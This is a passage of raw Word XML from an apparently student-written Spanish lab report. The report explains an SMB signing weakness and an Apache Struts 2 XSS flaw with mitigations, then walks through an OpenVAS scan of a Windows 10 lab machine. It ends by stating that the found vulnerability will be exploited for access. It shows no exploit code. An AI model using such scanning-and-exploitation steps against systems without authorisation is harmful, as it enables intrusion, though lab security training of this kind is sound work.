              <w:t>Para mitigar esta vulnerabilidad, se recomienda habilitar la firma digital SMB en el servidor, lo que obliga a los clientes a firmar digitalmente los mensajes enviados. También se recomienda utilizar una conexión segura, como SMB sobre VPN o SMB sobre SSH, para proteger la información transmitida a través de la red.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB4D1CE" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02AF38DD" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04FFAF34" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DAA1B07" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="259EF8B5" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51018585" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CC897C6" w14:textId="77777777" w:rsidR="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51900F0D" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B7F2469" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="788F2112" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36630538" w14:textId="5BD8B24F" w:rsidR="006B017F" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="233D5C44" wp14:editId="04094ED6">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="743747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47237" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId90" cstate="screen">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791DD3F7" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0750C64F" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>La vulnerabilidad "Apache Struts 2 s:a / s:url Tag href Element XSS" se refiere a una vulnerabilidad de tipo Cross-Site Scripting (XSS) que afecta a las aplicaciones web que utilizan el framework Apache Struts 2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D46B5D" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30279E23" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>En Struts 2, el tag "s:a" o "s:url" se utiliza para crear enlaces o URLs dinámicas en una página web. Si la entrada de usuario no se valida correctamente antes de ser utilizada en la creación de un enlace o URL, un atacante podría aprovechar esta vulnerabilidad para insertar código malicioso en la página web, que se ejecutaría en el navegador web del usuario víctima.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AEA65E6" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D5429CF" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Por ejemplo, un atacante podría crear un enlace malicioso que parezca legítimo pero en realidad contiene código JavaScript que roba información del usuario o realiza acciones maliciosas en su nombre.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D4AA69" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6002DFCC" w14:textId="7EE3A8CE" w:rsidR="006B017F" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Para mitigar esta vulnerabilidad, se recomienda actualizar a la última versión del framework Apache Struts 2, ya que las versiones anteriores a la 2.3.32 y 2.5.10.1 son vulnerables. También se recomienda implementar medidas de validación y saneamiento de la entrada de usuario en la aplicación web para evitar que se inyecte código malicioso en la página web.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB76886" w14:textId="7A1F08C2" w:rsidR="006B017F" w:rsidRDefault="00E25D51" w:rsidP="00E25D51">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>2. OpenVas -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="335155F7" w14:textId="77777777" w:rsidR="00E25D51" w:rsidRDefault="00E25D51" w:rsidP="00E25D51"/>
          <w:p w14:paraId="25304D47" w14:textId="1C3DB1CB" w:rsidR="006B017F" w:rsidRDefault="00D72A69" w:rsidP="00386103">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Para entrar en Openvas nos conectaremos a la IP siguiente por el puerto 80, el usuario será el que cada uno crearé como administrador de la web, en mi caso el usuario es admin y su contraseña admin.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBD65A6" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11FFE577" w14:textId="2F97382F" w:rsidR="006B017F" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575321B7" wp14:editId="2B413DA0">
                  <wp:extent cx="6645910" cy="4984115"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="255634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34194" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId91">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4984115"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="715E2898" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10E78A75" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="335606A5" w14:textId="75D3F0FB" w:rsidR="006B017F" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED0BC4D" wp14:editId="08D4BE34">
                  <wp:extent cx="5371429" cy="6323809"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
                  <wp:docPr id="432385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5915" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId92">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5371429" cy="6323809"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0FC7B7" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28CC95F2" w14:textId="14BDE174" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora entraremos y configuraremos el escaneo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D2617F" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DA4A6BB" w14:textId="3191408F" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="00994D80">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C668099" wp14:editId="73602E78">
                  <wp:extent cx="6645910" cy="3329940"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
                  <wp:docPr id="208319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95305" name=""/>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6645910" cy="3329940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C493EE7" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67C7BA72" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="227B6843" w14:textId="495FB277" w:rsidR="002F1CB6" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>En la segunda opción que señalo el captura anterior le daremos a new task.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B892B5" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3839B14B" w14:textId="26CA0B00" w:rsidR="002F1CB6" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3014BA0B" wp14:editId="15920DE0">
                  <wp:extent cx="6561455" cy="4219575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="412759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9537" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId94">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6561905" cy="4219864"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF4FD31" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0ACEB84A" w14:textId="4582752A" w:rsidR="002F1CB6" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Ahora le daremos en scan targets:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752CD774" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="775FFEF2" w14:textId="675EB445" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37369F65" wp14:editId="458DC7D9">
                  <wp:extent cx="6645910" cy="4342130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="1825322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2088" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId95">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4342130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E29A17" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38FC0B00" w14:textId="4F4FB83E" w:rsidR="002F1CB6" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y crearemos una credencial de smb:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25549D4B" w14:textId="133FA274" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B4803A0" wp14:editId="64BFCF8A">
                  <wp:extent cx="6645910" cy="4330700"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1529276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76413" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId96">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4330700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="18674196" w14:textId="3DF6B038" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D48AC0" wp14:editId="08DBB90D">
                  <wp:extent cx="6645910" cy="4342130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="1346275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75162" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId95">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4342130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="57681FDD" w14:textId="62ADC03C" w:rsidR="00994D80" w:rsidRDefault="00D63100" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Y ahora pulsaremos en el botón de play para empezar el escaneo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="314118DA" w14:textId="77777777" w:rsidR="00D63100" w:rsidRDefault="00D63100" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FE70B67" w14:textId="426E8B07" w:rsidR="00D63100" w:rsidRDefault="00D63100" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D85F2A" wp14:editId="78C79D01">
                  <wp:extent cx="6645910" cy="4201160"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
                  <wp:docPr id="767802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02887" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId97">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4201160"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3682670C" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="651DD238" w14:textId="129C221D" w:rsidR="00994D80" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD56A36" wp14:editId="38584B85">
                  <wp:extent cx="6645910" cy="4832985"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="412399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99707" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId98">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4832985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="338A97F9" w14:textId="372992F1" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando una vulnerabilidad de nivel alto para OpenVas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2BD3A8" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2FE35FB4" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="385FD46D" w14:textId="48D9D83F" w:rsidR="00994D80" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6849CF63" wp14:editId="72A5F562">
                  <wp:extent cx="6645910" cy="1402080"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="1615747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47024" name=""/>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6645910" cy="1402080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1130F50B" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="600EEFB5" w14:textId="5BF4782C" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Con dos cve.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCE7B55" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="492D3D7A" w14:textId="4A2CCC23" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Esta vulnerabilidad será la explotada en esta máquina de Windows 10 para lograr el acceso.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C0BDDD" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71B33242" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38BBE251" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07511D4E" w14:textId="0A7C8053" w:rsidR="00994D80" w:rsidRDefault="00984073" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6553A1AE" wp14:editId="546E6C86">
                  <wp:extent cx="6645910" cy="2283460"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="1287048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48811" name=""/>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6645910" cy="2283460"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C42E5F" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40FFACB2" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74A6E5B5" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="125D8816" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="436BF810" w14:textId="77777777" w:rsidR="00994D80" w:rsidRDefault="00994D80" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
